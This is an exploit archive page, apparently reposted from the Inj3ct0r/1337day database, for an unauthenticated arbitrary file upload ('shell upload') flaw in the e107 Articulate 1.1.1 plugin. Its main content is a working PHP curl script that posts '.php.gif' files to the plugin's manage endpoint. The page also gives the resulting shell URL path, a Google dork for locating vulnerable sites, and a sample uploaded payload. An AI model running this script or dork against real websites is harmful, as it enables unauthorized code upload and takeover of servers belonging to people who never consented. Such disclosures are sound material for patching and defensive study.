e107 Articulate 1.1.1 Shell Upload

e107 Articulate 1.1.1 Shell Upload: Posted Jun 23, 2012; Authored by Sammy FORGIT; e107 Articulate third party module version 1.1.1 suffers from an unauthenticated remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | 41b99ecb1b11992f69a368336dd53421e432b6e6aac49f238f066819b66025b8; Download | Favorite | View

e107 Articulate 1.1.1 Shell Upload

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Sammy FORGIT member from Inj3ct0r Team             1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : e107 plugins - Articulate Arbitrary File Upload Vulnerability
# Version : 1.1.1
# link : http://e107.org/e107_plugins/psilo/list.php?mode=plugin&cat=0&id=174
# Software : http://e107.org/e107_plugins/psilo/psilo.php?download.174
# Date : 19-06-2012
# Google Dork : inurl:/e107_plugins/articulate
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

<?php

$uploadfile="lo.php.gif";
$uploadfile2="db.php.gif";

$ch = curl_init("http://www.exemple.com/e107/e107_plugins/articulate/manage_articulate.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file_articulatepic[1]'=>"@$uploadfile",
                      'file_articulatepic[2]'=>"@$uploadfile2",
                      'articulate_action'=>'update'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
print "$postResult";

?>

Shell Access : http://www.exemple.com/e107/e107_plugins/articulate/pictures/ _lo.php.gif _db.php.gif

lo.php.gif
<?php
phpinfo();
?>


# Site : 1337day.com Inj3ct0r Exploit Database

Top Authors In Last 30 Days

Red Hat 227 files
Ubuntu 96 files
Gentoo 33 files
Debian 23 files
Google Security Research 19 files
Mirabbas Agalarov 17 files
indoushka 15 files
Apple 9 files
CraCkEr 9 files
Ivan Fratric 8 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,753)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,776)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,311)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,626)
UNIX (9,236)
UnixWare (186)
Windows (6,555)
Other

e107 Articulate 1.1.1 Shell Upload

e107 Articulate 1.1.1 Shell Upload

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

e107 Articulate 1.1.1 Shell Upload

Share This

e107 Articulate 1.1.1 Shell Upload

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems